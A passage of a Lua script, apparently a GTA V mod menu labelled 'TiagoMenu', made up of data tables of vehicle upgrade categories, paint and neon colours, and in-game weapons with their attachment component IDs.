  1148. {name = '~h~Arch Cover', id = 42},
  1149. {name = '~h~Aerials', id = 43},
  1150. {name = '~h~Trim 2', id = 44},
  1151. {name = '~h~Tank', id = 45},
  1152. {name = '~h~Windows', id = 46},
  1153. {name = '~h~Livery', id = 48},
  1154. {name = '~h~Wheels', id = 23},
  1155. {name = '~h~~r~Wheel Types', id = 'wheeltypes'},
  1156. {name = '~h~Extras', id = 'extra'},
  1157. {name = '~h~~o~Neons', id = 'neon'},
  1158. {name = '~h~~p~Paint', id = 'paint'}
  1159. }
  1160. local bf = {
  1161. {name = '~h~~r~Engine', id = 11},
  1162. {name = '~h~~b~Brakes', id = 12},
  1163. {name = '~h~~g~Transmission', id = 13},
  1164. {name = '~h~~y~Suspension', id = 15}
  1165. }
  1166. local bg = {
  1167. ['White'] = {255, 255, 255},
  1168. ['Blue'] = {0, 0, 255},
  1169. ['Electric Blue'] = {0, 150, 255},
  1170. ['Mint Green'] = {50, 255, 155},
  1171. ['Lime Green'] = {0, 255, 0},
  1172. ['Yellow'] = {255, 255, 0},
  1173. ['Golden Shower'] = {204, 204, 0},
  1174. ['Orange'] = {255, 128, 0},
  1175. ['Red'] = {255, 0, 0},
  1176. ['Pony Pink'] = {255, 102, 255},
  1177. ['Hot Pink'] = {255, 0, 255},
  1178. ['Purple'] = {153, 0, 153}
  1179. }
  1180. local bh = {
  1181. {name = '~h~Black', id = 0},
  1182. {name = '~h~Carbon Black', id = 147},
  1183. {name = '~h~Graphite', id = 1},
  1184. {name = '~h~Anhracite Black', id = 11},
  1185. {name = '~h~Black Steel', id = 2},
  1186. {name = '~h~Dark Steel', id = 3},
  1187. {name = '~h~Silver', id = 4},
  1188. {name = '~h~Bluish Silver', id = 5},
  1189. {name = '~h~Rolled Steel', id = 6},
  1190. {name = '~h~Shadow Silver', id = 7},
  1191. {name = '~h~Stone Silver', id = 8},
  1192. {name = '~h~Midnight Silver', id = 9},
  1193. {name = '~h~Cast Iron Silver', id = 10},
  1194. {name = '~h~Red', id = 27},
  1195. {name = '~h~Torino Red', id = 28},
  1196. {name = '~h~Formula Red', id = 29},
  1197. {name = '~h~Lava Red', id = 150},
  1198. {name = '~h~Blaze Red', id = 30},
  1199. {name = '~h~Grace Red', id = 31},
  1200. {name = '~h~Garnet Red', id = 32},
  1201. {name = '~h~Sunset Red', id = 33},
  1202. {name = '~h~Cabernet Red', id = 34},
  1203. {name = '~h~Wine Red', id = 143},
  1204. {name = '~h~Candy Red', id = 35},
  1205. {name = '~h~Hot Pink', id = 135},
  1206. {name = '~h~Pfsiter Pink', id = 137},
  1207. {name = '~h~Salmon Pink', id = 136},
  1208. {name = '~h~Sunrise Orange', id = 36},
  1209. {name = '~h~Orange', id = 38},
  1210. {name = '~h~Bright Orange', id = 138},
  1211. {name = '~h~Gold', id = 99},
  1212. {name = '~h~Bronze', id = 90},
  1213. {name = '~h~Yellow', id = 88},
  1214. {name = '~h~Race Yellow', id = 89},
  1215. {name = '~h~Dew Yellow', id = 91},
  1216. {name = '~h~Dark Green', id = 49},
  1217. {name = '~h~Racing Green', id = 50},
  1218. {name = '~h~Sea Green', id = 51},
  1219. {name = '~h~Olive Green', id = 52},
  1220. {name = '~h~Bright Green', id = 53},
  1221. {name = '~h~Gasoline Green', id = 54},
  1222. {name = '~h~Lime Green', id = 92},
  1223. {name = '~h~Midnight Blue', id = 141},
  1224. {name = '~h~Galaxy Blue', id = 61},
  1225. {name = '~h~Dark Blue', id = 62},
  1226. {name = '~h~Saxon Blue', id = 63},
  1227. {name = '~h~Blue', id = 64},
  1228. {name = '~h~Mariner Blue', id = 65},
  1229. {name = '~h~Harbor Blue', id = 66},
  1230. {name = '~h~Diamond Blue', id = 67},
  1231. {name = '~h~Surf Blue', id = 68},
  1232. {name = '~h~Nautical Blue', id = 69},
  1233. {name = '~h~Racing Blue', id = 73},
  1234. {name = '~h~Ultra Blue', id = 70},
  1235. {name = '~h~Light Blue', id = 74},
  1236. {name = '~h~Chocolate Brown', id = 96},
  1237. {name = '~h~Bison Brown', id = 101},
  1238. {name = '~h~Creeen Brown', id = 95},
  1239. {name = '~h~Feltzer Brown', id = 94},
  1240. {name = '~h~Maple Brown', id = 97},
  1241. {name = '~h~Beechwood Brown', id = 103},
  1242. {name = '~h~Sienna Brown', id = 104},
  1243. {name = '~h~Saddle Brown', id = 98},
  1244. {name = '~h~Moss Brown', id = 100},
  1245. {name = '~h~Woodbeech Brown', id = 102},
  1246. {name = '~h~Straw Brown', id = 99},
  1247. {name = '~h~Sandy Brown', id = 105},
  1248. {name = '~h~Bleached Brown', id = 106},
  1249. {name = '~h~Schafter Purple', id = 71},
  1250. {name = '~h~Spinnaker Purple', id = 72},
  1251. {name = '~h~Midnight Purple', id = 142},
  1252. {name = '~h~Bright Purple', id = 145},
  1253. {name = '~h~Cream', id = 107},
  1254. {name = '~h~Ice White', id = 111},
  1255. {name = '~h~Frost White', id = 112}
  1256. }
  1257. local bi = '~u~TiagoMenu ~s~Official'
  1258. local bj = {
  1259. {name = '~h~Black', id = 12},
  1260. {name = '~h~Gray', id = 13},
  1261. {name = '~h~Light Gray', id = 14},
  1262. {name = '~h~Ice White', id = 131},
  1263. {name = '~h~Blue', id = 83},
  1264. {name = '~h~Dark Blue', id = 82},
  1265. {name = '~h~Midnight Blue', id = 84},
  1266. {name = '~h~Midnight Purple', id = 149},
  1267. {name = '~h~Schafter Purple', id = 148},
  1268. {name = '~h~Red', id = 39},
  1269. {name = '~h~Dark Red', id = 40},
  1270. {name = '~h~Orange', id = 41},
  1271. {name = '~h~Yellow', id = 42},
  1272. {name = '~h~Lime Green', id = 55},
  1273. {name = '~h~Green', id = 128},
  1274. {name = '~h~Forest Green', id = 151},
  1275. {name = '~h~Foliage Green', id = 155},
  1276. {name = '~h~Olive Darb', id = 152},
  1277. {name = '~h~Dark Earth', id = 153},
  1278. {name = '~h~Desert Tan', id = 154}
  1279. }
  1280. local bk = {
  1281. {name = '~h~Brushed Steel', id = 117},
  1282. {name = '~h~Brushed Black Steel', id = 118},
  1283. {name = '~h~Brushed Aluminum', id = 119},
  1284. {name = '~h~Pure Gold', id = 158},
  1285. {name = '~h~Brushed Gold', id = 159}
  1286. }
  1288. local b0 = {
  1289. Melee = {
  1290. BaseballBat = {
  1291. id = 'weapon_bat',
  1292. name = '~h~~r~> ~s~Baseball Bat',
  1293. bInfAmmo = false,
  1294. mods = {}
  1295. },
  1296. BrokenBottle = {
  1297. id = 'weapon_bottle',
  1298. name = '~h~~r~> ~s~Broken Bottle',
  1299. bInfAmmo = false,
  1300. mods = {}
  1301. },
  1302. Crowbar = {
  1303. id = 'weapon_Crowbar',
  1304. name = '~h~~r~> ~s~Crowbar',
  1305. bInfAmmo = false,
  1306. mods = {}
  1307. },
  1308. Flashlight = {
  1309. id = 'weapon_flashlight',
  1310. name = '~h~~r~> ~s~Flashlight',
  1311. bInfAmmo = false,
  1312. mods = {}
  1313. },
  1314. GolfClub = {
  1315. id = 'weapon_golfclub',
  1316. name = '~h~~r~> ~s~Golf Club',
  1317. bInfAmmo = false,
  1318. mods = {}
  1319. },
  1320. BrassKnuckles = {
  1321. id = 'weapon_knuckle',
  1322. name = '~h~~r~> ~s~Brass Knuckles',
  1323. bInfAmmo = false,
  1324. mods = {}
  1325. },
  1326. Knife = {
  1327. id = 'weapon_knife',
  1328. name = '~h~~r~> ~s~Knife',
  1329. bInfAmmo = false,
  1330. mods = {}
  1331. },
  1332. Machete = {
  1333. id = 'weapon_machete',
  1334. name = '~h~~r~> ~s~Machete',
  1335. bInfAmmo = false,
  1336. mods = {}
  1337. },
  1338. Switchblade = {
  1339. id = 'weapon_switchblade',
  1340. name = '~h~~r~> ~s~Switchblade',
  1341. bInfAmmo = false,
  1342. mods = {}
  1343. },
  1344. Nightstick = {
  1345. id = 'weapon_nightstick',
  1346. name = '~h~~r~> ~s~Nightstick',
  1347. bInfAmmo = false,
  1348. mods = {}
  1349. },
  1350. BattleAxe = {
  1351. id = 'weapon_battleaxe',
  1352. name = '~h~~r~> ~s~Battle Axe',
  1353. bInfAmmo = false,
  1354. mods = {}
  1355. }
  1356. },
  1357. Handguns = {
  1358. Pistol = {
  1359. id = 'weapon_pistol',
  1360. name = '~h~~r~> ~s~Pistol',
  1361. bInfAmmo = false,
  1362. mods = {
  1363. Magazines = {
  1364. {
  1365. name = '~h~~r~> ~s~Default Magazine',
  1366. id = 'COMPONENT_PISTOL_CLIP_01'
  1367. },
  1368. {
  1369. name = '~h~~r~> ~s~Extended Magazine',
  1370. id = 'COMPONENT_PISTOL_CLIP_02'
  1371. }
  1372. },
  1373. Flashlight = {
  1374. {
  1375. name = '~h~~r~> ~s~Flashlight',
  1376. id = 'COMPONENT_AT_PI_FLSH'
  1377. }
  1378. },
  1379. BarrelAttachments = {
  1380. {
  1381. name = '~h~~r~> ~s~Suppressor',
  1382. id = 'COMPONENT_AT_PI_SUPP_02'
  1383. }
  1384. }
  1385. }
  1386. },
  1387. PistolMK2 = {
  1388. id = 'weapon_pistol_mk2',
  1389. name = '~h~~r~> ~s~Pistol MK 2',
  1390. bInfAmmo = false,
  1391. mods = {
  1392. Magazines = {
  1393. {
  1394. name = '~h~~r~> ~s~Default Magazine',
  1395. id = 'COMPONENT_PISTOL_MK2_CLIP_01'
  1396. },
  1397. {
  1398. name = '~h~~r~> ~s~Extended Magazine',
  1399. id = 'COMPONENT_PISTOL_MK2_CLIP_02'
  1400. },
  1401. {
  1402. name = '~h~~r~> ~s~Tracer Rounds',
  1404. },
  1405. {
  1406. name = '~h~~r~> ~s~Incendiary Rounds',
  1408. },
  1409. {
  1410. name = '~h~~r~> ~s~Hollow Point Rounds',
  1412. },
  1413. {
  1414. name = '~h~~r~> ~s~FMJ Rounds',
  1416. }
  1417. },
  1418. Sights = {
  1419. {
  1420. name = '~h~~r~> ~s~Mounted Scope',
  1421. id = 'COMPONENT_AT_PI_RAIL'
  1422. }
  1423. },
  1424. Flashlight = {
  1425. {
  1426. name = '~h~~r~> ~s~Flashlight',
  1427. id = 'COMPONENT_AT_PI_FLSH_02'
  1428. }
  1429. },
  1430. BarrelAttachments = {
  1431. {
  1432. name = '~h~~r~> ~s~Compensator',
  1433. id = 'COMPONENT_AT_PI_COMP'
  1434. },
  1435. {
  1436. name = '~h~~r~> ~s~Suppessor',
  1437. id = 'COMPONENT_AT_PI_SUPP_02'
  1438. }
  1439. }
  1440. }
  1441. },
  1442. CombatPistol = {
  1443. id = 'weapon_combatpistol',
  1444. name = '~h~Combat Pistol',
  1445. bInfAmmo = false,
  1446. mods = {
  1447. Magazines = {
  1448. {
  1449. name = '~h~~r~> ~s~Default Magazine',
  1451. },
  1452. {
  1453. name = '~h~~r~> ~s~Extended Magazine',
  1455. }
  1456. },
  1457. Flashlight = {
  1458. {
  1459. name = '~h~~r~> ~s~Flashlight',
  1460. id = 'COMPONENT_AT_PI_FLSH'
  1461. }
  1462. },
  1463. BarrelAttachments = {
  1464. {
  1465. name = '~h~~r~> ~s~Suppressor',
  1466. id = 'COMPONENT_AT_PI_SUPP'
  1467. }
  1468. }
  1469. }
  1470. },
  1471. APPistol = {
  1472. id = 'weapon_appistol',
  1473. name = 'AP Pistol',
  1474. bInfAmmo = false,
  1475. mods = {
  1476. Magazines = {
  1477. {
  1478. name = '~h~~r~> ~s~Default Magazine',
  1480. },
  1481. {
  1482. name = '~h~~r~> ~s~Extended Magazine',
  1484. }
  1485. },
  1486. Flashlight = {
  1487. {
  1488. name = '~h~~r~> ~s~Flashlight',
  1489. id = 'COMPONENT_AT_PI_FLSH'
  1490. }
  1491. },
  1492. BarrelAttachments = {
  1493. {
  1494. name = '~h~~r~> ~s~Suppressor',
  1495. id = 'COMPONENT_AT_PI_SUPP'
  1496. }
  1497. }
  1498. }
  1499. },
  1500. StunGun = {
  1501. id = 'weapon_stungun',
  1502. name = '~h~~r~> ~s~Stun Gun',
  1503. bInfAmmo = false,
  1504. mods = {}
  1505. },
  1506. Pistol50 = {
  1507. id = 'weapon_pistol50',
  1508. name = '~h~~r~> ~s~Pistol .50',
  1509. bInfAmmo = false,
  1510. mods = {
  1511. Magazines = {
  1512. {
  1513. name = '~h~~r~> ~s~Default Magazine',
  1514. id = 'COMPONENT_PISTOL50_CLIP_01'
  1515. },
  1516. {
  1517. name = '~h~~r~> ~s~Extended Magazine',
  1518. id = 'COMPONENT_PISTOL50_CLIP_02'
  1519. }
  1520. },
  1521. Flashlight = {
  1522. {
  1523. name = '~h~~r~> ~s~Flashlight',
  1524. id = 'COMPONENT_AT_PI_FLSH'
  1525. }
  1526. },
  1527. BarrelAttachments = {
  1528. {
  1529. name = '~h~~r~> ~s~Suppressor',
  1530. id = 'COMPONENT_AT_PI_SUPP_02'
  1531. }
  1532. }
  1533. }
  1534. },
  1535. SNSPistol = {
  1536. id = 'weapon_snspistol',
  1537. name = '~h~~r~> ~s~SNS Pistol',
  1538. bInfAmmo = false,
  1539. mods = {
  1540. Magazines = {
  1541. {
  1542. name = '~h~~r~> ~s~Default Magazine',
  1544. },
  1545. {
  1546. name = '~h~~r~> ~s~Extended Magazine',
  1548. }
  1549. }
  1550. }
  1551. },
  1552. SNSPistolMkII = {
  1553. id = 'weapon_snspistol_mk2',
  1554. name = '~h~~r~> ~s~SNS Pistol Mk II',
  1555. bInfAmmo = false,
  1556. mods = {
  1557. Magazines = {
  1558. {
  1559. name = '~h~~r~> ~s~Default Magazine',
  1561. },
  1562. {
  1563. name = '~h~~r~> ~s~Extended Magazine',
  1565. },
  1566. {
  1567. name = '~h~~r~> ~s~Tracer Rounds',
  1569. },
  1570. {
  1571. name = '~h~~r~> ~s~Incendiary Rounds',
  1573. },
  1574. {
  1575. name = '~h~~r~> ~s~Hollow Point Rounds',
  1577. },
  1578. {
  1579. name = '~h~~r~> ~s~FMJ Rounds',
  1581. }
  1582. },
  1583. Sights = {
  1584. {
  1585. name = '~h~~r~> ~s~Mounted Scope',
  1586. id = 'COMPONENT_AT_PI_RAIL_02'
  1587. }
  1588. },
  1589. Flashlight = {
  1590. {
  1591. name = '~h~~r~> ~s~Flashlight',
  1592. id = 'COMPONENT_AT_PI_FLSH_03'
  1593. }
  1594. },
  1595. BarrelAttachments = {
  1596. {
  1597. name = '~h~~r~> ~s~Compensator',
  1598. id = 'COMPONENT_AT_PI_COMP_02'
  1599. },
  1600. {
  1601. name = '~h~~r~> ~s~Suppressor',
  1602. id = 'COMPONENT_AT_PI_SUPP_02'
  1603. }
  1604. }
  1605. }
  1606. },
  1607. HeavyPistol = {
  1608. id = 'weapon_heavypistol',
  1609. name = '~h~~r~> ~s~Heavy Pistol',
  1610. bInfAmmo = false,
  1611. mods = {
  1612. Magazines = {
  1613. {
  1614. name = '~h~~r~> ~s~Default Magazine',
  1616. },
  1617. {
  1618. name = '~h~~r~> ~s~Extended Magazine',
  1620. }
  1621. },
  1622. Flashlight = {
  1623. {
  1624. name = '~h~~r~> ~s~Flashlight',
  1625. id = 'COMPONENT_AT_PI_FLSH'
  1626. }
  1627. },
  1628. BarrelAttachments = {
  1629. {
  1630. name = '~h~~r~> ~s~Suppressor',
  1631. id = 'COMPONENT_AT_PI_SUPP'
  1632. }
  1633. }
  1634. }
  1635. },
  1636. VintagePistol = {
  1637. id = 'weapon_vintagepistol',
  1638. name = '~h~~r~> ~s~Vintage Pistol',
  1639. bInfAmmo = false,
  1640. mods = {
  1641. Magazines = {
  1642. {
  1643. name = '~h~~r~> ~s~Default Magazine',
  1645. },
  1646. {
  1647. name = '~h~~r~> ~s~Extended Magazine',
  1649. }
  1650. },
  1651. BarrelAttachments = {
  1652. {'Suppressor', id = 'COMPONENT_AT_PI_SUPP'}
  1653. }
  1654. }
  1655. },
  1656. FlareGun = {
  1657. id = 'weapon_flaregun',
  1658. name = '~h~~r~> ~s~Flare Gun',
  1659. bInfAmmo = false,
  1660. mods = {}
  1661. },
  1662. MarksmanPistol = {
  1663. id = 'weapon_marksmanpistol',
  1664. name = '~h~~r~> ~s~Marksman Pistol',
  1665. bInfAmmo = false,
  1666. mods = {}
  1667. },
  1668. HeavyRevolver = {
  1669. id = 'weapon_revolver',
  1670. name = '~h~~r~> ~s~Heavy Revolver',
  1671. bInfAmmo = false,
  1672. mods = {}
  1673. },
  1674. HeavyRevolverMkII = {
  1675. id = 'weapon_revolver_mk2',
  1676. name = '~h~~r~> ~s~Heavy Revolver Mk II',
  1677. bInfAmmo = false,
  1678. mods = {
  1679. Magazines = {
  1680. {
  1681. name = '~h~~r~> ~s~Default Rounds',
  1683. },
  1684. {
  1685. name = '~h~~r~> ~s~Tracer Rounds',
  1687. },
  1688. {
  1689. name = '~h~~r~> ~s~Incendiary Rounds',
  1691. },
  1692. {
  1693. name = '~h~~r~> ~s~Hollow Point Rounds',
  1695. },
  1696. {
  1697. name = '~h~~r~> ~s~FMJ Rounds',
  1699. }
  1700. },
  1701. Sights = {
  1702. {
  1703. name = '~h~~r~> ~s~Holograhpic Sight',
  1704. id = 'COMPONENT_AT_SIGHTS'
  1705. },
  1706. {
  1707. name = '~h~~r~> ~s~Small Scope',
  1709. }
  1710. },
  1711. Flashlight = {
  1712. {
  1713. name = '~h~~r~> ~s~Flashlight',
  1714. id = 'COMPONENT_AT_PI_FLSH'
  1715. }
  1716. },
  1717. BarrelAttachments = {
  1718. {
  1719. name = '~h~~r~> ~s~Compensator',
  1720. id = 'COMPONENT_AT_PI_COMP_03'
  1721. }
  1722. }
  1723. }
  1724. },
  1725. DoubleActionRevolver = {
  1726. id = 'weapon_doubleaction',
  1727. name = '~h~~r~> ~s~Double Action Revolver',
  1728. bInfAmmo = false,
  1729. mods = {}
  1730. },
  1731. UpnAtomizer = {
  1732. id = 'weapon_raypistol',
  1733. name = '~h~~r~> ~s~Up-n-Atomizer',
  1734. bInfAmmo = false,
  1735. mods = {}
  1736. }
  1737. },
  1738. SMG = {
  1739. MicroSMG = {
  1740. id = 'weapon_microsmg',
  1741. name = '~h~~r~> ~s~Micro SMG',
  1742. bInfAmmo = false,
  1743. mods = {
  1744. Magazines = {
  1745. {
  1746. name = '~h~~r~> ~s~Default Magazine',
  1748. },
  1749. {
  1750. name = '~h~~r~> ~s~Extended Magazine',
  1752. }
  1753. },
  1754. Sights = {
  1755. {name = '~h~~r~> ~s~Scope', id = 'COMPONENT_AT_SCOPE_MACRO'}
  1756. },
  1757. Flashlight = {
  1758. {
  1759. name = '~h~~r~> ~s~Flashlight',
  1760. id = 'COMPONENT_AT_PI_FLSH'
  1761. }
  1762. },
  1763. BarrelAttachments = {
  1764. {
  1765. name = '~h~~r~> ~s~Suppressor',
  1766. id = 'COMPONENT_AT_AR_SUPP_02'
  1767. }
  1768. }
  1769. }
  1770. },
  1771. SMG = {
  1772. id = 'weapon_smg',
  1773. name = '~h~~r~> ~s~SMG',
  1774. bInfAmmo = false,
  1775. mods = {
  1776. Magazines = {
  1777. {
  1778. name = '~h~~r~> ~s~Default Magazine',
  1779. id = 'COMPONENT_SMG_CLIP_01'
  1780. },
  1781. {
  1782. name = '~h~~r~> ~s~Extended Magazine',
  1783. id = 'COMPONENT_SMG_CLIP_02'
  1784. },
  1785. {
  1786. name = '~h~~r~> ~s~Drum Magazine',
  1787. id = 'COMPONENT_SMG_CLIP_03'
  1788. }
  1789. },
  1790. Sights = {
  1791. {
  1792. name = '~h~~r~> ~s~Scope',
  1793. id = 'COMPONENT_AT_SCOPE_MACRO_02'
  1794. }
  1795. },
  1796. Flashlight = {
  1797. {
  1798. name = '~h~~r~> ~s~Flashlight',
  1799. id = 'COMPONENT_AT_AR_FLSH'
  1800. }
  1801. },
  1802. BarrelAttachments = {
  1803. {
  1804. name = '~h~~r~> ~s~Suppressor',
  1805. id = 'COMPONENT_AT_PI_SUPP'
  1806. }
  1807. }
  1808. }
  1809. },
  1810. SMGMkII = {
  1811. id = 'weapon_smg_mk2',
  1812. name = '~h~~r~> ~s~SMG Mk II',
  1813. bInfAmmo = false,
  1814. mods = {
  1815. Magazines = {
  1816. {
  1817. name = '~h~~r~> ~s~Default Magazine',
  1818. id = 'COMPONENT_SMG_MK2_CLIP_01'
  1819. },
  1820. {
  1821. name = '~h~~r~> ~s~Extended Magazine',
  1822. id = 'COMPONENT_SMG_MK2_CLIP_02'
  1823. },
  1824. {
  1825. name = '~h~~r~> ~s~Tracer Rounds',
  1827. },
  1828. {
  1829. name = '~h~~r~> ~s~Incendiary Rounds',
  1831. },
  1832. {
  1833. name = '~h~~r~> ~s~Hollow Point Rounds',
  1835. },
  1836. {
  1837. name = '~h~~r~> ~s~FMJ Rounds',
  1839. }
  1840. },
  1841. Sights = {
  1842. {
  1843. name = '~h~~r~> ~s~Holograhpic Sight',
  1845. },
  1846. {
  1847. name = '~h~~r~> ~s~Small Scope',
  1849. },
  1850. {
  1851. name = '~h~~r~> ~s~Medium Scope',
  1853. }
  1854. },
  1855. Flashlight = {
  1856. {
  1857. name = '~h~~r~> ~s~Flashlight',
  1858. id = 'COMPONENT_AT_AR_FLSH'
  1859. }
  1860. },
  1861. Barrel = {
  1862. {
  1863. name = '~h~~r~> ~s~Default',
  1864. id = 'COMPONENT_AT_SB_BARREL_01'
  1865. },
  1866. {
  1867. name = '~h~~r~> ~s~Heavy',
  1868. id = 'COMPONENT_AT_SB_BARREL_02'
  1869. }
  1870. },
  1871. BarrelAttachments = {
  1872. {
  1873. name = '~h~~r~> ~s~Suppressor',
  1874. id = 'COMPONENT_AT_PI_SUPP'
  1875. },
  1876. {
  1877. name = '~h~~r~> ~s~Flat Muzzle Brake',
  1878. id = 'COMPONENT_AT_MUZZLE_01'
  1879. },
  1880. {
  1881. name = '~h~~r~> ~s~Tactical Muzzle Brake',
  1882. id = 'COMPONENT_AT_MUZZLE_02'
  1883. },
  1884. {
  1885. name = '~h~~r~> ~s~Fat-End Muzzle Brake',
  1886. id = 'COMPONENT_AT_MUZZLE_03'
  1887. },
  1888. {
  1889. name = '~h~~r~> ~s~Precision Muzzle Brake',
  1890. id = 'COMPONENT_AT_MUZZLE_04'
  1891. },
  1892. {
  1893. name = '~h~~r~> ~s~Heavy Duty Muzzle Brake',
  1894. id = 'COMPONENT_AT_MUZZLE_05'
  1895. },
  1896. {
  1897. name = '~h~~r~> ~s~Slanted Muzzle Brake',
  1898. id = 'COMPONENT_AT_MUZZLE_06'
  1899. },
  1900. {
  1901. name = '~h~~r~> ~s~Split-End Muzzle Brake',
  1902. id = 'COMPONENT_AT_MUZZLE_07'
  1903. }
  1904. }
  1905. }
  1906. },
  1907. AssaultSMG = {
  1908. id = 'weapon_assaultsmg',
  1909. name = '~h~~r~> ~s~Assault SMG',
  1910. bInfAmmo = false,
  1911. mods = {
  1912. Magazines = {
  1913. {
  1914. name = '~h~~r~> ~s~Default Magazine',
  1916. },
  1917. {
  1918. name = '~h~~r~> ~s~Extended Magazine',
  1920. }
  1921. },
  1922. Sights = {
  1923. {name = '~h~~r~> ~s~Scope', id = 'COMPONENT_AT_SCOPE_MACRO'}
  1924. },
  1925. Flashlight = {
  1926. {
  1927. name = '~h~~r~> ~s~Flashlight',
  1928. id = 'COMPONENT_AT_AR_FLSH'
  1929. }
  1930. },
  1931. BarrelAttachments = {
  1932. {
  1933. name = '~h~~r~> ~s~Suppressor',
  1934. id = 'COMPONENT_AT_AR_SUPP_02'
  1935. }
  1936. }
  1937. }
  1938. },
  1939. CombatPDW = {
  1940. id = 'weapon_combatpdw',
  1941. name = '~h~~r~> ~s~Combat PDW',
  1942. bInfAmmo = false,
  1943. mods = {
  1944. Magazines = {
  1945. {
  1946. name = '~h~~r~> ~s~Default Magazine',
  1948. },
  1949. {
  1950. name = '~h~~r~> ~s~Extended Magazine',
  1952. },
  1953. {
  1954. name = '~h~~r~> ~s~Drum Magazine',
  1956. }
  1957. },
  1958. Sights = {
  1959. {name = '~h~~r~> ~s~Scope', id = 'COMPONENT_AT_SCOPE_SMALL'}
  1960. },
  1961. Flashlight = {
  1962. {
  1963. name = '~h~~r~> ~s~Flashlight',
  1964. id = 'COMPONENT_AT_AR_FLSH'
  1965. }
  1966. },
  1967. Grips = {
  1968. {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP'}
  1969. }
  1970. }
  1971. },
  1972. MachinePistol = {
  1973. id = 'weapon_machinepistol',
  1974. name = '~h~~r~> ~s~Machine Pistol ',
  1975. bInfAmmo = false,
  1976. mods = {
  1977. Magazines = {
  1978. {
  1979. name = '~h~~r~> ~s~Default Magazine',
  1981. },
  1982. {
  1983. name = '~h~~r~> ~s~Extended Magazine',
  1985. },
  1986. {
  1987. name = '~h~~r~> ~s~Drum Magazine',
  1989. }
  1990. },
  1991. BarrelAttachments = {
  1992. {
  1993. name = '~h~~r~> ~s~Suppressor',
  1994. id = 'COMPONENT_AT_PI_SUPP'
  1995. }
  1996. }
  1997. }
  1998. },
  1999. MiniSMG = {
  2000. id = 'weapon_minismg',
  2001. name = '~h~~r~> ~s~Mini SMG',
  2002. bInfAmmo = false,
  2003. mods = {
  2004. Magazines = {
  2005. {
  2006. name = '~h~~r~> ~s~Default Magazine',
  2007. id = 'COMPONENT_MINISMG_CLIP_01'
  2008. },
  2009. {
  2010. name = '~h~~r~> ~s~Extended Magazine',
  2011. id = 'COMPONENT_MINISMG_CLIP_02'
  2012. }
  2013. }
  2014. }
  2015. },
  2016. UnholyHellbringer = {
  2017. id = 'weapon_raycarbine',
  2018. name = '~h~~r~> ~s~Unholy Hellbringer',
  2019. bInfAmmo = false,
  2020. mods = {}
  2021. }
  2022. },
  2023. Shotguns = {
  2024. PumpShotgun = {
  2025. id = 'weapon_pumpshotgun',
  2026. name = '~h~~r~> ~s~Pump Shotgun',
  2027. bInfAmmo = false,
  2028. mods = {
  2029. Flashlight = {
  2030. {'name = Flashlight', id = 'COMPONENT_AT_AR_FLSH'}
  2031. },
  2032. BarrelAttachments = {
  2033. {
  2034. name = '~h~~r~> ~s~Suppressor',
  2035. id = 'COMPONENT_AT_SR_SUPP'
  2036. }
  2037. }
  2038. }
  2039. },
  2040. PumpShotgunMkII = {
  2041. id = 'weapon_pumpshotgun_mk2',
  2042. name = '~h~~r~> ~s~Pump Shotgun Mk II',
  2043. bInfAmmo = false,
  2044. mods = {
  2045. Magazines = {
  2046. {
  2047. name = '~h~~r~> ~s~Default Shells',
  2049. },
  2050. {
  2051. name = '~h~~r~> ~s~Dragon Breath Shells',
  2053. },
  2054. {
  2055. name = '~h~~r~> ~s~Steel Buckshot Shells',
  2057. },
  2058. {
  2059. name = '~h~~r~> ~s~Flechette Shells',
  2061. },
  2062. {
  2063. name = '~h~~r~> ~s~Explosive Slugs',
  2065. }
  2066. },
  2067. Sights = {
  2068. {
  2069. name = '~h~~r~> ~s~Holograhpic Sight',
  2070. id = 'COMPONENT_AT_SIGHTS'
  2071. },
  2072. {
  2073. name = '~h~~r~> ~s~Small Scope',
  2075. },
  2076. {
  2077. name = '~h~~r~> ~s~Medium Scope',
  2079. }
  2080. },
  2081. Flashlight = {
  2082. {
  2083. name = '~h~~r~> ~s~Flashlight',
  2084. id = 'COMPONENT_AT_AR_FLSH'
  2085. }
  2086. },
  2087. BarrelAttachments = {
  2088. {
  2089. name = '~h~~r~> ~s~Suppressor',
  2090. id = 'COMPONENT_AT_SR_SUPP_03'
  2091. },
  2092. {
  2093. name = '~h~~r~> ~s~Squared Muzzle Brake',
  2094. id = 'COMPONENT_AT_MUZZLE_08'
  2095. }
  2096. }
  2097. }
  2098. },
  2099. SawedOffShotgun = {
  2100. id = 'weapon_sawnoffshotgun',
  2101. name = '~h~~r~> ~s~Sawed-Off Shotgun',
  2102. bInfAmmo = false,
  2103. mods = {}
  2104. },
  2105. AssaultShotgun = {
  2106. id = 'weapon_assaultshotgun',
  2107. name = '~h~~r~> ~s~Assault Shotgun',
  2108. bInfAmmo = false,
  2109. mods = {
  2110. Magazines = {
  2111. {
  2112. name = '~h~~r~> ~s~Default Magazine',
  2114. },
  2115. {
  2116. name = '~h~~r~> ~s~Extended Magazine',
  2118. }
  2119. },
  2120. Flashlight = {
  2121. {
  2122. name = '~h~~r~> ~s~Flashlight',
  2123. id = 'COMPONENT_AT_AR_FLSH'
  2124. }
  2125. },
  2126. BarrelAttachments = {
  2127. {
  2128. name = '~h~~r~> ~s~Suppressor',
  2129. id = 'COMPONENT_AT_AR_SUPP'
  2130. }
  2131. },
  2132. Grips = {
  2133. {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP'}
  2134. }
  2135. }
  2136. },
  2137. BullpupShotgun = {
  2138. id = 'weapon_bullpupshotgun',
  2139. name = '~h~~r~> ~s~Bullpup Shotgun',
  2140. bInfAmmo = false,
  2141. mods = {
  2142. Flashlight = {
  2143. {
  2144. name = '~h~~r~> ~s~Flashlight',
  2145. id = 'COMPONENT_AT_AR_FLSH'
  2146. }
  2147. },
  2148. BarrelAttachments = {
  2149. {
  2150. name = '~h~~r~> ~s~Suppressor',
  2151. id = 'COMPONENT_AT_AR_SUPP_02'
  2152. }
  2153. },
  2154. Grips = {
  2155. {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP'}
  2156. }
  2157. }
  2158. },
  2159. Musket = {
  2160. id = 'weapon_musket',
  2161. name = '~h~~r~> ~s~Musket',
  2162. bInfAmmo = false,
  2163. mods = {}
  2164. },
  2165. HeavyShotgun = {
  2166. id = 'weapon_heavyshotgun',
  2167. name = '~h~~r~> ~s~Heavy Shotgun',
  2168. bInfAmmo = false,
  2169. mods = {
  2170. Magazines = {
  2171. {
  2172. name = '~h~~r~> ~s~Default Magazine',
  2174. },
  2175. {
  2176. name = '~h~~r~> ~s~Extended Magazine',
  2178. },
  2179. {
